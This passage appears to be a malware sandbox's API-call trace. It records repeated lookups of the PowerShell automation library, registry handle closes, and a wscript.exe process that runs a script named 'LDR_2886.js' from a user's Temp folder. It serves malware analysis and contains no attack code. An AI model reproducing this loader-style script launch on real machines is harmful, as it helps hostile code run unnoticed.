	[0228.457] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.458] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.459] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.460] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.461] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.462] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.463] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.469] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.470] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.471] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0228.472] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.321] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.322] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.324] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.721] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.722] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc450, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0241.722] VirtualQuery (in: lpAddress=0xdbb80, lpBuffer=0xdca40, dwLength=0x30 | out: lpBuffer=0xdca40*(BaseAddress=0xdb000, AllocationBase=0x60000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0242.273] CoTaskMemAlloc (cb=0x104) returned 0x27d0e0
	[0242.273] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0242.273] CoTaskMemFree (pv=0x27d0e0) 
	[0242.281] VirtualQuery (in: lpAddress=0xdbb80, lpBuffer=0xdca40, dwLength=0x30 | out: lpBuffer=0xdca40*(BaseAddress=0xdb000, AllocationBase=0x60000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0242.296] CoTaskMemAlloc (cb=0x104) returned 0x27d0e0
	[0242.296] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0242.296] CoTaskMemFree (pv=0x27d0e0) 
	[0242.300] CoTaskMemAlloc (cb=0x104) returned 0x27d0e0
	[0242.300] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0242.300] CoTaskMemFree (pv=0x27d0e0) 
	[0242.302] CoTaskMemAlloc (cb=0x104) returned 0x27d0e0
	[0242.302] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0242.302] CoTaskMemFree (pv=0x27d0e0) 
	[0242.309] CoTaskMemAlloc (cb=0x104) returned 0x27d0e0
	[0242.309] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0242.309] CoTaskMemFree (pv=0x27d0e0) 
	[0242.314] CoTaskMemAlloc (cb=0x104) returned 0x27d0e0
	[0242.314] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0242.314] CoTaskMemFree (pv=0x27d0e0) 
	[0242.315] CoTaskMemAlloc (cb=0x104) returned 0x27d0e0
	[0242.315] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0242.315] CoTaskMemFree (pv=0x27d0e0) 
	[0243.148] VirtualQuery (in: lpAddress=0xdbb80, lpBuffer=0xdca40, dwLength=0x30 | out: lpBuffer=0xdca40*(BaseAddress=0xdb000, AllocationBase=0x60000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0243.151] VirtualQuery (in: lpAddress=0xdbb80, lpBuffer=0xdca40, dwLength=0x30 | out: lpBuffer=0xdca40*(BaseAddress=0xdb000, AllocationBase=0x60000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0250.003] VirtualQuery (in: lpAddress=0xdbb80, lpBuffer=0xdca40, dwLength=0x30 | out: lpBuffer=0xdca40*(BaseAddress=0xdb000, AllocationBase=0x60000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0250.380] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d0e0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0250.380] CoTaskMemFree (pv=0x27d0e0) 
	[0252.274] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x27d520
	[0252.276] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x27d630
	[0259.109] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0259.109] CoTaskMemFree (pv=0x27d740) 
	[0259.123] CoTaskMemAlloc (cb=0x104) returned 0x27d740
	[0259.123] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x27d740, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0259.123] CoTaskMemFree (pv=0x27d740) 
	[0259.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0259.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0259.126] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0259.127] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xdc730, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74

Thread:
	id = 151
	os_tid = 0xb94


Thread:
	id = 154
	os_tid = 0x6f4


Thread:
	id = 156
	os_tid = 0x52c


Thread:
	id = 159
	os_tid = 0xb58


Thread:
	id = 160
	os_tid = 0x81c

	[0074.486] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0149.666] LocalFree (hMem=0x2538f0) returned 0x0
	[0149.667] CloseHandle (hObject=0x1d0) returned 1
	[0149.667] CloseHandle (hObject=0x13) returned 1
	[0149.667] CloseHandle (hObject=0xf) returned 1
	[0149.668] RegCloseKey (hKey=0x30c) returned 0x0
	[0149.682] RegCloseKey (hKey=0x324) returned 0x0
	[0149.682] RegCloseKey (hKey=0x308) returned 0x0
	[0149.682] RegCloseKey (hKey=0x304) returned 0x0
	[0149.682] LocalFree (hMem=0x2538c0) returned 0x0
	[0165.947] RegCloseKey (hKey=0x308) returned 0x0
	[0203.327] RegCloseKey (hKey=0x370) returned 0x0
	[0203.327] RegCloseKey (hKey=0x36c) returned 0x0
	[0203.327] RegCloseKey (hKey=0x368) returned 0x0
	[0203.327] RegCloseKey (hKey=0x364) returned 0x0
	[0203.327] RegCloseKey (hKey=0x340) returned 0x0
	[0203.328] RegCloseKey (hKey=0x388) returned 0x0
	[0203.328] RegCloseKey (hKey=0x35c) returned 0x0
	[0203.328] RegCloseKey (hKey=0x358) returned 0x0
	[0203.328] RegCloseKey (hKey=0x354) returned 0x0
	[0203.329] RegCloseKey (hKey=0x350) returned 0x0
	[0203.329] RegCloseKey (hKey=0x34c) returned 0x0
	[0203.329] RegCloseKey (hKey=0x348) returned 0x0
	[0203.329] RegCloseKey (hKey=0x344) returned 0x0
	[0203.329] RegCloseKey (hKey=0x384) returned 0x0
	[0203.329] RegCloseKey (hKey=0x380) returned 0x0
	[0203.330] RegCloseKey (hKey=0x334) returned 0x0
	[0203.330] RegCloseKey (hKey=0x330) returned 0x0
	[0203.330] RegCloseKey (hKey=0x32c) returned 0x0
	[0203.330] RegCloseKey (hKey=0x1d0) returned 0x0
	[0203.330] RegCloseKey (hKey=0x30c) returned 0x0
	[0203.331] RegCloseKey (hKey=0x328) returned 0x0
	[0203.331] RegCloseKey (hKey=0x324) returned 0x0
	[0203.331] RegCloseKey (hKey=0x320) returned 0x0
	[0203.331] RegCloseKey (hKey=0x31c) returned 0x0
	[0203.331] RegCloseKey (hKey=0x360) returned 0x0
	[0203.332] RegCloseKey (hKey=0x38c) returned 0x0
	[0203.332] RegCloseKey (hKey=0x378) returned 0x0
	[0203.333] RegCloseKey (hKey=0x374) returned 0x0
	[0252.672] RegCloseKey (hKey=0x374) returned 0x0

Thread:
	id = 271
	os_tid = 0x3d4


Process:
	id = "19"
	image_name = "wscript.exe"
	filename = "c:\\windows\\system32\\wscript.exe"
	page_root = "0x4aacf000"
	os_pid = "0x8c0"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x910"
	cmd_line = "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" "
	cur_dir = "C:\\Users\\aETAdzjz\\Documents\\"
	os_username = "YKYD69Q\\aETAdzjz"
	bitness = "64"
	os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 165
	os_tid = 0x8c4

	[0077.171] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19fea0 | out: lpSystemTimeAsFileTime=0x19fea0*(dwLowDateTime=0xa6665d90, dwHighDateTime=0x1d543d1)) 
	[0077.171] GetCurrentProcessId () returned 0x8c0
	[0077.171] GetCurrentThreadId () returned 0x8c4
	[0077.171] GetTickCount () returned 0x23fae
